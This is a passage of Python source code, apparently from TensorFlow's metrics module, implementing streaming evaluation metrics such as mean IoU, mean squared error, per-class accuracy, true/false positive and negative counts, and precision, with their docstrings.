mean_distance, update_op = mean(radial_diffs, weights, None, None, name or
'mean_cosine_distance')
mean_distance = math_ops.subtract(1.0, mean_distance)
update_op = math_ops.subtract(1.0, update_op)
if metrics_collections:
ops.add_to_collections(metrics_collections, mean_distance)
if updates_collections:
ops.add_to_collections(updates_collections, update_op)
return mean_distance, update_op
@tf_export('metrics.mean_per_class_accuracy')
def mean_per_class_accuracy(labels,
predictions,
num_classes,
weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Calculates the mean of the per-class accuracies.
Calculates the accuracy for each class, then takes the mean of that.
For estimation of the metric over a stream of data, the function creates an
`update_op` operation that updates the accuracy of each class and returns
them.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: A `Tensor` of ground truth labels with shape [batch size] and of
type `int32` or `int64`. The tensor will be flattened if its rank > 1.
predictions: A `Tensor` of prediction results for semantic labels, whose
shape is [batch size] and type `int32` or `int64`. The tensor will be
flattened if its rank > 1.
num_classes: The possible number of labels the prediction task can
have. This value must be provided, since two variables with shape =
[num_classes] will be allocated.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
metrics_collections: An optional list of collections that
`mean_per_class_accuracy'
should be added to.
updates_collections: An optional list of collections `update_op` should be
added to.
name: An optional variable_scope name.
Returns:
mean_accuracy: A `Tensor` representing the mean per class accuracy.
update_op: An operation that updates the accuracy tensor.
Raises:
ValueError: If `predictions` and `labels` have mismatched shapes, or if
`weights` is not `None` and its shape doesn't match `predictions`, or if
either `metrics_collections` or `updates_collections` are not a list or
tuple.
RuntimeError: If eager execution is enabled.
"""
if context.executing_eagerly():
raise RuntimeError('tf.metrics.mean_per_class_accuracy is not supported '
'when eager execution is enabled.')
with variable_scope.variable_scope(name, 'mean_accuracy',
(predictions, labels, weights)):
labels = math_ops.to_int64(labels)
# Flatten the input if its rank > 1.
if labels.get_shape().ndims > 1:
labels = array_ops.reshape(labels, [-1])
if predictions.get_shape().ndims > 1:
predictions = array_ops.reshape(predictions, [-1])
# Check if shape is compatible.
predictions.get_shape().assert_is_compatible_with(labels.get_shape())
total = metric_variable([num_classes], dtypes.float32, name='total')
count = metric_variable([num_classes], dtypes.float32, name='count')
ones = array_ops.ones([array_ops.size(labels)], dtypes.float32)
if labels.dtype != predictions.dtype:
predictions = math_ops.cast(predictions, labels.dtype)
is_correct = math_ops.to_float(math_ops.equal(predictions, labels))
if weights is not None:
if weights.get_shape().ndims > 1:
weights = array_ops.reshape(weights, [-1])
weights = math_ops.to_float(weights)
is_correct *= weights
ones *= weights
update_total_op = state_ops.scatter_add(total, labels, ones)
update_count_op = state_ops.scatter_add(count, labels, is_correct)
def compute_mean_accuracy(_, count, total):
per_class_accuracy = _safe_div(
count, math_ops.maximum(total, 0), name=None)
mean_accuracy_v = math_ops.reduce_mean(
per_class_accuracy, name='mean_accuracy')
return mean_accuracy_v
mean_accuracy_v = _aggregate_across_replicas(
metrics_collections, compute_mean_accuracy, count, total)
update_op = _safe_div(update_count_op,
math_ops.maximum(update_total_op, 0),
name='update_op')
if updates_collections:
ops.add_to_collections(updates_collections, update_op)
return mean_accuracy_v, update_op
@tf_export('metrics.mean_iou')
def mean_iou(labels,
predictions,
num_classes,
weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Calculate per-step mean Intersection-Over-Union (mIOU).
Mean Intersection-Over-Union is a common evaluation metric for
semantic image segmentation, which first computes the IOU for each
semantic class and then computes the average over classes.
IOU is defined as follows:
IOU = true_positive / (true_positive + false_positive + false_negative).
The predictions are accumulated in a confusion matrix, weighted by `weights`,
and mIOU is then calculated from it.
For estimation of the metric over a stream of data, the function creates an
`update_op` operation that updates these variables and returns the `mean_iou`.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: A `Tensor` of ground truth labels with shape [batch size] and of
type `int32` or `int64`. The tensor will be flattened if its rank > 1.
predictions: A `Tensor` of prediction results for semantic labels, whose
shape is [batch size] and type `int32` or `int64`. The tensor will be
flattened if its rank > 1.
num_classes: The possible number of labels the prediction task can
have. This value must be provided, since a confusion matrix of
dimension = [num_classes, num_classes] will be allocated.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
metrics_collections: An optional list of collections that `mean_iou`
should be added to.
updates_collections: An optional list of collections `update_op` should be
added to.
name: An optional variable_scope name.
Returns:
mean_iou: A `Tensor` representing the mean intersection-over-union.
update_op: An operation that increments the confusion matrix.
Raises:
ValueError: If `predictions` and `labels` have mismatched shapes, or if
`weights` is not `None` and its shape doesn't match `predictions`, or if
either `metrics_collections` or `updates_collections` are not a list or
tuple.
RuntimeError: If eager execution is enabled.
"""
if context.executing_eagerly():
raise RuntimeError('tf.metrics.mean_iou is not supported when '
'eager execution is enabled.')
with variable_scope.variable_scope(name, 'mean_iou',
(predictions, labels, weights)):
# Check if shape is compatible.
predictions.get_shape().assert_is_compatible_with(labels.get_shape())
total_cm, update_op = _streaming_confusion_matrix(labels, predictions,
num_classes, weights)
def compute_mean_iou(_, total_cm):
"""Compute the mean intersection-over-union via the confusion matrix."""
sum_over_row = math_ops.to_float(math_ops.reduce_sum(total_cm, 0))
sum_over_col = math_ops.to_float(math_ops.reduce_sum(total_cm, 1))
cm_diag = math_ops.to_float(array_ops.diag_part(total_cm))
denominator = sum_over_row + sum_over_col - cm_diag
# The mean is only computed over classes that appear in the
# label or prediction tensor. If the denominator is 0, we need to
# ignore the class.
num_valid_entries = math_ops.reduce_sum(
math_ops.cast(
math_ops.not_equal(denominator, 0), dtype=dtypes.float32))
# If the value of the denominator is 0, set it to 1 to avoid
# zero division.
denominator = array_ops.where(
math_ops.greater(denominator, 0), denominator,
array_ops.ones_like(denominator))
iou = math_ops.div(cm_diag, denominator)
# If the number of valid entries is 0 (no classes) we return 0.
result = array_ops.where(
math_ops.greater(num_valid_entries, 0),
math_ops.reduce_sum(iou, name='mean_iou') / num_valid_entries, 0)
return result
# TODO(priyag): Use outside_compilation if in TPU context.
mean_iou_v = _aggregate_across_replicas(
metrics_collections, compute_mean_iou, total_cm)
if updates_collections:
ops.add_to_collections(updates_collections, update_op)
return mean_iou_v, update_op
@tf_export('metrics.mean_relative_error')
def mean_relative_error(labels,
predictions,
normalizer,
weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Computes the mean relative error by normalizing with the given values.
The `mean_relative_error` function creates two local variables,
`total` and `count` that are used to compute the mean relative absolute error.
This average is weighted by `weights`, and it is ultimately returned as
`mean_relative_error`: an idempotent operation that simply divides `total` by
`count`.
For estimation of the metric over a stream of data, the function creates an
`update_op` operation that updates these variables and returns the
`mean_reative_error`. Internally, a `relative_errors` operation divides the
absolute value of the differences between `predictions` and `labels` by the
`normalizer`. Then `update_op` increments `total` with the reduced sum of the
product of `weights` and `relative_errors`, and it increments `count` with the
reduced sum of `weights`.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: A `Tensor` of the same shape as `predictions`.
predictions: A `Tensor` of arbitrary shape.
normalizer: A `Tensor` of the same shape as `predictions`.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
metrics_collections: An optional list of collections that
`mean_relative_error` should be added to.
updates_collections: An optional list of collections that `update_op` should
be added to.
name: An optional variable_scope name.
Returns:
mean_relative_error: A `Tensor` representing the current mean, the value of
`total` divided by `count`.
update_op: An operation that increments the `total` and `count` variables
appropriately and whose value matches `mean_relative_error`.
Raises:
ValueError: If `predictions` and `labels` have mismatched shapes, or if
`weights` is not `None` and its shape doesn't match `predictions`, or if
either `metrics_collections` or `updates_collections` are not a list or
tuple.
RuntimeError: If eager execution is enabled.
"""
if context.executing_eagerly():
raise RuntimeError('tf.metrics.mean_relative_error is not supported when '
'eager execution is enabled.')
predictions, labels, weights = _remove_squeezable_dimensions(
predictions=predictions, labels=labels, weights=weights)
predictions, normalizer = confusion_matrix.remove_squeezable_dimensions(
predictions, normalizer)
predictions.get_shape().assert_is_compatible_with(normalizer.get_shape())
relative_errors = array_ops.where(
math_ops.equal(normalizer, 0.0), array_ops.zeros_like(labels),
math_ops.div(math_ops.abs(labels - predictions), normalizer))
return mean(relative_errors, weights, metrics_collections,
updates_collections, name or 'mean_relative_error')
@tf_export('metrics.mean_squared_error')
def mean_squared_error(labels,
predictions,
weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Computes the mean squared error between the labels and predictions.
The `mean_squared_error` function creates two local variables,
`total` and `count` that are used to compute the mean squared error.
This average is weighted by `weights`, and it is ultimately returned as
`mean_squared_error`: an idempotent operation that simply divides `total` by
`count`.
For estimation of the metric over a stream of data, the function creates an
`update_op` operation that updates these variables and returns the
`mean_squared_error`. Internally, a `squared_error` operation computes the
element-wise square of the difference between `predictions` and `labels`. Then
`update_op` increments `total` with the reduced sum of the product of
`weights` and `squared_error`, and it increments `count` with the reduced sum
of `weights`.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: A `Tensor` of the same shape as `predictions`.
predictions: A `Tensor` of arbitrary shape.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
metrics_collections: An optional list of collections that
`mean_squared_error` should be added to.
updates_collections: An optional list of collections that `update_op` should
be added to.
name: An optional variable_scope name.
Returns:
mean_squared_error: A `Tensor` representing the current mean, the value of
`total` divided by `count`.
update_op: An operation that increments the `total` and `count` variables
appropriately and whose value matches `mean_squared_error`.
Raises:
ValueError: If `predictions` and `labels` have mismatched shapes, or if
`weights` is not `None` and its shape doesn't match `predictions`, or if
either `metrics_collections` or `updates_collections` are not a list or
tuple.
RuntimeError: If eager execution is enabled.
"""
if context.executing_eagerly():
raise RuntimeError('tf.metrics.mean_squared_error is not supported when '
'eager execution is enabled.')
predictions, labels, weights = _remove_squeezable_dimensions(
predictions=predictions, labels=labels, weights=weights)
squared_error = math_ops.square(labels - predictions)
return mean(squared_error, weights, metrics_collections, updates_collections,
name or 'mean_squared_error')
@tf_export('metrics.mean_tensor')
def mean_tensor(values,
weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Computes the element-wise (weighted) mean of the given tensors.
In contrast to the `mean` function which returns a scalar with the
mean, this function returns an average tensor with the same shape as the
input tensors.
The `mean_tensor` function creates two local variables,
`total_tensor` and `count_tensor` that are used to compute the average of
`values`. This average is ultimately returned as `mean` which is an idempotent
operation that simply divides `total` by `count`.
For estimation of the metric over a stream of data, the function creates an
`update_op` operation that updates these variables and returns the `mean`.
`update_op` increments `total` with the reduced sum of the product of `values`
and `weights`, and it increments `count` with the reduced sum of `weights`.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
values: A `Tensor` of arbitrary dimensions.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`values`, and must be broadcastable to `values` (i.e., all dimensions must
be either `1`, or the same as the corresponding `values` dimension).
metrics_collections: An optional list of collections that `mean`
should be added to.
updates_collections: An optional list of collections that `update_op`
should be added to.
name: An optional variable_scope name.
Returns:
mean: A float `Tensor` representing the current mean, the value of `total`
divided by `count`.
update_op: An operation that increments the `total` and `count` variables
appropriately and whose value matches `mean_value`.
Raises:
ValueError: If `weights` is not `None` and its shape doesn't match `values`,
or if either `metrics_collections` or `updates_collections` are not a list
or tuple.
RuntimeError: If eager execution is enabled.
"""
if context.executing_eagerly():
raise RuntimeError('tf.metrics.mean_tensor is not supported when '
'eager execution is enabled.')
with variable_scope.variable_scope(name, 'mean', (values, weights)):
values = math_ops.to_float(values)
total = metric_variable(
values.get_shape(), dtypes.float32, name='total_tensor')
count = metric_variable(
values.get_shape(), dtypes.float32, name='count_tensor')
num_values = array_ops.ones_like(values)
if weights is not None:
values, _, weights = _remove_squeezable_dimensions(
predictions=values, labels=None, weights=weights)
weights = weights_broadcast_ops.broadcast_weights(
math_ops.to_float(weights), values)
values = math_ops.multiply(values, weights)
num_values = math_ops.multiply(num_values, weights)
update_total_op = state_ops.assign_add(total, values)
with ops.control_dependencies([values]):
update_count_op = state_ops.assign_add(count, num_values)
compute_mean = lambda _, t, c: _safe_div(
t, math_ops.maximum(c, 0), name='value')
mean_t = _aggregate_across_replicas(
metrics_collections, compute_mean, total, count)
update_op = _safe_div(update_total_op,
math_ops.maximum(update_count_op, 0),
name='update_op')
if updates_collections:
ops.add_to_collections(updates_collections, update_op)
return mean_t, update_op
@tf_export('metrics.percentage_below')
def percentage_below(values,
threshold,
weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Computes the percentage of values less than the given threshold.
The `percentage_below` function creates two local variables,
`total` and `count` that are used to compute the percentage of `values` that
fall below `threshold`. This rate is weighted by `weights`, and it is
ultimately returned as `percentage` which is an idempotent operation that
simply divides `total` by `count`.
For estimation of the metric over a stream of data, the function creates an
`update_op` operation that updates these variables and returns the
`percentage`.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
values: A numeric `Tensor` of arbitrary size.
threshold: A scalar threshold.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`values`, and must be broadcastable to `values` (i.e., all dimensions must
be either `1`, or the same as the corresponding `values` dimension).
metrics_collections: An optional list of collections that the metric
value variable should be added to.
updates_collections: An optional list of collections that the metric update
ops should be added to.
name: An optional variable_scope name.
Returns:
percentage: A `Tensor` representing the current mean, the value of `total`
divided by `count`.
update_op: An operation that increments the `total` and `count` variables
appropriately.
Raises:
ValueError: If `weights` is not `None` and its shape doesn't match `values`,
or if either `metrics_collections` or `updates_collections` are not a list
or tuple.
RuntimeError: If eager execution is enabled.
"""
if context.executing_eagerly():
raise RuntimeError('tf.metrics.percentage_below is not supported when '
'eager execution is enabled.')
is_below_threshold = math_ops.to_float(math_ops.less(values, threshold))
return mean(is_below_threshold, weights, metrics_collections,
updates_collections, name or 'percentage_below_threshold')
def _count_condition(values,
weights=None,
metrics_collections=None,
updates_collections=None):
"""Sums the weights of cases where the given values are True.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
values: A `bool` `Tensor` of arbitrary size.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`values`, and must be broadcastable to `values` (i.e., all dimensions must
be either `1`, or the same as the corresponding `values` dimension).
metrics_collections: An optional list of collections that the metric
value variable should be added to.
updates_collections: An optional list of collections that the metric update
ops should be added to.
Returns:
value_tensor: A `Tensor` representing the current value of the metric.
update_op: An operation that accumulates the error from a batch of data.
Raises:
ValueError: If `weights` is not `None` and its shape doesn't match `values`,
or if either `metrics_collections` or `updates_collections` are not a list
or tuple.
"""
check_ops.assert_type(values, dtypes.bool)
count = metric_variable([], dtypes.float32, name='count')
values = math_ops.to_float(values)
if weights is not None:
with ops.control_dependencies((check_ops.assert_rank_in(
weights, (0, array_ops.rank(values))),)):
weights = math_ops.to_float(weights)
values = math_ops.multiply(values, weights)
value_tensor = _aggregate_variable(count, metrics_collections)
update_op = state_ops.assign_add(count, math_ops.reduce_sum(values))
if updates_collections:
ops.add_to_collections(updates_collections, update_op)
return value_tensor, update_op
@tf_export('metrics.false_negatives')
def false_negatives(labels,
predictions,
weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Computes the total number of false negatives.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: The ground truth values, a `Tensor` whose dimensions must match
`predictions`. Will be cast to `bool`.
predictions: The predicted values, a `Tensor` of arbitrary dimensions. Will
be cast to `bool`.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
metrics_collections: An optional list of collections that the metric
value variable should be added to.
updates_collections: An optional list of collections that the metric update
ops should be added to.
name: An optional variable_scope name.
Returns:
value_tensor: A `Tensor` representing the current value of the metric.
update_op: An operation that accumulates the error from a batch of data.
Raises:
ValueError: If `weights` is not `None` and its shape doesn't match `values`,
or if either `metrics_collections` or `updates_collections` are not a list
or tuple.
RuntimeError: If eager execution is enabled.
"""
if context.executing_eagerly():
raise RuntimeError('tf.metrics.false_negatives is not supported when '
'eager execution is enabled.')
with variable_scope.variable_scope(name, 'false_negatives',
(predictions, labels, weights)):
predictions, labels, weights = _remove_squeezable_dimensions(
predictions=math_ops.cast(predictions, dtype=dtypes.bool),
labels=math_ops.cast(labels, dtype=dtypes.bool),
weights=weights)
is_false_negative = math_ops.logical_and(
math_ops.equal(labels, True), math_ops.equal(predictions, False))
return _count_condition(is_false_negative, weights, metrics_collections,
updates_collections)
@tf_export('metrics.false_negatives_at_thresholds')
def false_negatives_at_thresholds(labels,
predictions,
thresholds,
weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Computes false negatives at provided threshold values.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: A `Tensor` whose shape matches `predictions`. Will be cast to
`bool`.
predictions: A floating point `Tensor` of arbitrary shape and whose values
are in the range `[0, 1]`.
thresholds: A python list or tuple of float thresholds in `[0, 1]`.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
metrics_collections: An optional list of collections that `false_negatives`
should be added to.
updates_collections: An optional list of collections that `update_op` should
be added to.
name: An optional variable_scope name.
Returns:
false_negatives: A float `Tensor` of shape `[len(thresholds)]`.
update_op: An operation that updates the `false_negatives` variable and
returns its current value.
Raises:
ValueError: If `predictions` and `labels` have mismatched shapes, or if
`weights` is not `None` and its shape doesn't match `predictions`, or if
either `metrics_collections` or `updates_collections` are not a list or
tuple.
RuntimeError: If eager execution is enabled.
"""
if context.executing_eagerly():
raise RuntimeError('tf.metrics.false_negatives_at_thresholds is not '
'supported when eager execution is enabled.')
with variable_scope.variable_scope(name, 'false_negatives',
(predictions, labels, weights)):
values, update_ops = _confusion_matrix_at_thresholds(
labels, predictions, thresholds, weights=weights, includes=('fn',))
fn_value = _aggregate_variable(values['fn'], metrics_collections)
if updates_collections:
ops.add_to_collections(updates_collections, update_ops['fn'])
return fn_value, update_ops['fn']
@tf_export('metrics.false_positives')
def false_positives(labels,
predictions,
weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Sum the weights of false positives.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: The ground truth values, a `Tensor` whose dimensions must match
`predictions`. Will be cast to `bool`.
predictions: The predicted values, a `Tensor` of arbitrary dimensions. Will
be cast to `bool`.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
metrics_collections: An optional list of collections that the metric
value variable should be added to.
updates_collections: An optional list of collections that the metric update
ops should be added to.
name: An optional variable_scope name.
Returns:
value_tensor: A `Tensor` representing the current value of the metric.
update_op: An operation that accumulates the error from a batch of data.
Raises:
ValueError: If `predictions` and `labels` have mismatched shapes, or if
`weights` is not `None` and its shape doesn't match `predictions`, or if
either `metrics_collections` or `updates_collections` are not a list or
tuple.
RuntimeError: If eager execution is enabled.
"""
if context.executing_eagerly():
raise RuntimeError('tf.metrics.false_positives is not supported when '
'eager execution is enabled.')
with variable_scope.variable_scope(name, 'false_positives',
(predictions, labels, weights)):
predictions, labels, weights = _remove_squeezable_dimensions(
predictions=math_ops.cast(predictions, dtype=dtypes.bool),
labels=math_ops.cast(labels, dtype=dtypes.bool),
weights=weights)
is_false_positive = math_ops.logical_and(
math_ops.equal(labels, False), math_ops.equal(predictions, True))
return _count_condition(is_false_positive, weights, metrics_collections,
updates_collections)
@tf_export('metrics.false_positives_at_thresholds')
def false_positives_at_thresholds(labels,
predictions,
thresholds,
weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Computes false positives at provided threshold values.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: A `Tensor` whose shape matches `predictions`. Will be cast to
`bool`.
predictions: A floating point `Tensor` of arbitrary shape and whose values
are in the range `[0, 1]`.
thresholds: A python list or tuple of float thresholds in `[0, 1]`.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
metrics_collections: An optional list of collections that `false_positives`
should be added to.
updates_collections: An optional list of collections that `update_op` should
be added to.
name: An optional variable_scope name.
Returns:
false_positives: A float `Tensor` of shape `[len(thresholds)]`.
update_op: An operation that updates the `false_positives` variable and
returns its current value.
Raises:
ValueError: If `predictions` and `labels` have mismatched shapes, or if
`weights` is not `None` and its shape doesn't match `predictions`, or if
either `metrics_collections` or `updates_collections` are not a list or
tuple.
RuntimeError: If eager execution is enabled.
"""
if context.executing_eagerly():
raise RuntimeError('tf.metrics.false_positives_at_thresholds is not '
'supported when eager execution is enabled.')
with variable_scope.variable_scope(name, 'false_positives',
(predictions, labels, weights)):
values, update_ops = _confusion_matrix_at_thresholds(
labels, predictions, thresholds, weights=weights, includes=('fp',))
fp_value = _aggregate_variable(values['fp'], metrics_collections)
if updates_collections:
ops.add_to_collections(updates_collections, update_ops['fp'])
return fp_value, update_ops['fp']
@tf_export('metrics.true_negatives')
def true_negatives(labels,
predictions,
weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Sum the weights of true_negatives.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: The ground truth values, a `Tensor` whose dimensions must match
`predictions`. Will be cast to `bool`.
predictions: The predicted values, a `Tensor` of arbitrary dimensions. Will
be cast to `bool`.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
metrics_collections: An optional list of collections that the metric
value variable should be added to.
updates_collections: An optional list of collections that the metric update
ops should be added to.
name: An optional variable_scope name.
Returns:
value_tensor: A `Tensor` representing the current value of the metric.
update_op: An operation that accumulates the error from a batch of data.
Raises:
ValueError: If `predictions` and `labels` have mismatched shapes, or if
`weights` is not `None` and its shape doesn't match `predictions`, or if
either `metrics_collections` or `updates_collections` are not a list or
tuple.
RuntimeError: If eager execution is enabled.
"""
if context.executing_eagerly():
raise RuntimeError('tf.metrics.true_negatives is not '
'supported when eager execution is enabled.')
with variable_scope.variable_scope(name, 'true_negatives',
(predictions, labels, weights)):
predictions, labels, weights = _remove_squeezable_dimensions(
predictions=math_ops.cast(predictions, dtype=dtypes.bool),
labels=math_ops.cast(labels, dtype=dtypes.bool),
weights=weights)
is_true_negative = math_ops.logical_and(
math_ops.equal(labels, False), math_ops.equal(predictions, False))
return _count_condition(is_true_negative, weights, metrics_collections,
updates_collections)
@tf_export('metrics.true_negatives_at_thresholds')
def true_negatives_at_thresholds(labels,
predictions,
thresholds,
weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Computes true negatives at provided threshold values.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: A `Tensor` whose shape matches `predictions`. Will be cast to
`bool`.
predictions: A floating point `Tensor` of arbitrary shape and whose values
are in the range `[0, 1]`.
thresholds: A python list or tuple of float thresholds in `[0, 1]`.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
metrics_collections: An optional list of collections that `true_negatives`
should be added to.
updates_collections: An optional list of collections that `update_op` should
be added to.
name: An optional variable_scope name.
Returns:
true_negatives: A float `Tensor` of shape `[len(thresholds)]`.
update_op: An operation that updates the `true_negatives` variable and
returns its current value.
Raises:
ValueError: If `predictions` and `labels` have mismatched shapes, or if
`weights` is not `None` and its shape doesn't match `predictions`, or if
either `metrics_collections` or `updates_collections` are not a list or
tuple.
RuntimeError: If eager execution is enabled.
"""
if context.executing_eagerly():
raise RuntimeError('tf.metrics.true_negatives_at_thresholds is not '
'supported when eager execution is enabled.')
with variable_scope.variable_scope(name, 'true_negatives',
(predictions, labels, weights)):
values, update_ops = _confusion_matrix_at_thresholds(
labels, predictions, thresholds, weights=weights, includes=('tn',))
tn_value = _aggregate_variable(values['tn'], metrics_collections)
if updates_collections:
ops.add_to_collections(updates_collections, update_ops['tn'])
return tn_value, update_ops['tn']
@tf_export('metrics.true_positives')
def true_positives(labels,
predictions,
weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Sum the weights of true_positives.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: The ground truth values, a `Tensor` whose dimensions must match
`predictions`. Will be cast to `bool`.
predictions: The predicted values, a `Tensor` of arbitrary dimensions. Will
be cast to `bool`.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
metrics_collections: An optional list of collections that the metric
value variable should be added to.
updates_collections: An optional list of collections that the metric update
ops should be added to.
name: An optional variable_scope name.
Returns:
value_tensor: A `Tensor` representing the current value of the metric.
update_op: An operation that accumulates the error from a batch of data.
Raises:
ValueError: If `predictions` and `labels` have mismatched shapes, or if
`weights` is not `None` and its shape doesn't match `predictions`, or if
either `metrics_collections` or `updates_collections` are not a list or
tuple.
RuntimeError: If eager execution is enabled.
"""
if context.executing_eagerly():
raise RuntimeError('tf.metrics.true_positives is not '
'supported when eager execution is enabled.')
with variable_scope.variable_scope(name, 'true_positives',
(predictions, labels, weights)):
predictions, labels, weights = _remove_squeezable_dimensions(
predictions=math_ops.cast(predictions, dtype=dtypes.bool),
labels=math_ops.cast(labels, dtype=dtypes.bool),
weights=weights)
is_true_positive = math_ops.logical_and(
math_ops.equal(labels, True), math_ops.equal(predictions, True))
return _count_condition(is_true_positive, weights, metrics_collections,
updates_collections)
@tf_export('metrics.true_positives_at_thresholds')
def true_positives_at_thresholds(labels,
predictions,
thresholds,
weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Computes true positives at provided threshold values.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: A `Tensor` whose shape matches `predictions`. Will be cast to
`bool`.
predictions: A floating point `Tensor` of arbitrary shape and whose values
are in the range `[0, 1]`.
thresholds: A python list or tuple of float thresholds in `[0, 1]`.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
metrics_collections: An optional list of collections that `true_positives`
should be added to.
updates_collections: An optional list of collections that `update_op` should
be added to.
name: An optional variable_scope name.
Returns:
true_positives: A float `Tensor` of shape `[len(thresholds)]`.
update_op: An operation that updates the `true_positives` variable and
returns its current value.
Raises:
ValueError: If `predictions` and `labels` have mismatched shapes, or if
`weights` is not `None` and its shape doesn't match `predictions`, or if
either `metrics_collections` or `updates_collections` are not a list or
tuple.
RuntimeError: If eager execution is enabled.
"""
if context.executing_eagerly():
raise RuntimeError('tf.metrics.true_positives_at_thresholds is not '
'supported when eager execution is enabled.')
with variable_scope.variable_scope(name, 'true_positives',
(predictions, labels, weights)):
values, update_ops = _confusion_matrix_at_thresholds(
labels, predictions, thresholds, weights=weights, includes=('tp',))
tp_value = _aggregate_variable(values['tp'], metrics_collections)
if updates_collections:
ops.add_to_collections(updates_collections, update_ops['tp'])
return tp_value, update_ops['tp']
@tf_export('metrics.precision')
def precision(labels,
predictions,
weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Computes the precision of the predictions with respect to the labels.
The `precision` function creates two local variables,
`true_positives` and `false_positives`, that are used to compute the
precision. This value is ultimately returned as `precision`, an idempotent
operation that simply divides `true_positives` by the sum of `true_positives`
and `false_positives`.
For estimation of the metric over a stream of data, the function creates an
`update_op` operation that updates these variables and returns the
`precision`. `update_op` weights each prediction by the corresponding value in
`weights`.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: The ground truth values, a `Tensor` whose dimensions must match
`predictions`. Will be cast to `bool`.
predictions: The predicted values, a `Tensor` of arbitrary dimensions. Will
be cast to `bool`.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
metrics_collections: An optional list of collections that `precision` should
be added to.
updates_collections: An optional list of collections that `update_op` should
be added to.
name: An optional variable_scope name.
Returns:
precision: Scalar float `Tensor` with the value of `true_positives`
divided by the sum of `true_positives` and `false_positives`.
update_op: `Operation` that increments `true_positives` and
`false_positives` variables appropriately and whose value matches
`precision`.
Raises:
ValueError: If `predictions` and `labels` have mismatched shapes, or if
`weights` is not `None` and its shape doesn't match `predictions`, or if
either `metrics_collections` or `updates_collections` are not a list or
tuple.
RuntimeError: If eager execution is enabled.
"""
if context.executing_eagerly():
raise RuntimeError('tf.metrics.precision is not '
'supported when eager execution is enabled.')
with variable_scope.variable_scope(name, 'precision',
(predictions, labels, weights)):
predictions, labels, weights = _remove_squeezable_dimensions(
predictions=math_ops.cast(predictions, dtype=dtypes.bool),
labels=math_ops.cast(labels, dtype=dtypes.bool),
weights=weights)
true_p, true_positives_update_op = true_positives(
labels,
predictions,
weights,
metrics_collections=None,
updates_collections=None,
name=None)
false_p, false_positives_update_op = false_positives(
labels,
predictions,
weights,
metrics_collections=None,
updates_collections=None,
name=None)
def compute_precision(tp, fp, name):
return array_ops.where(
math_ops.greater(tp + fp, 0), math_ops.div(tp, tp + fp), 0, name)
def once_across_replicas(_, true_p, false_p):
return compute_precision(true_p, false_p, 'value')
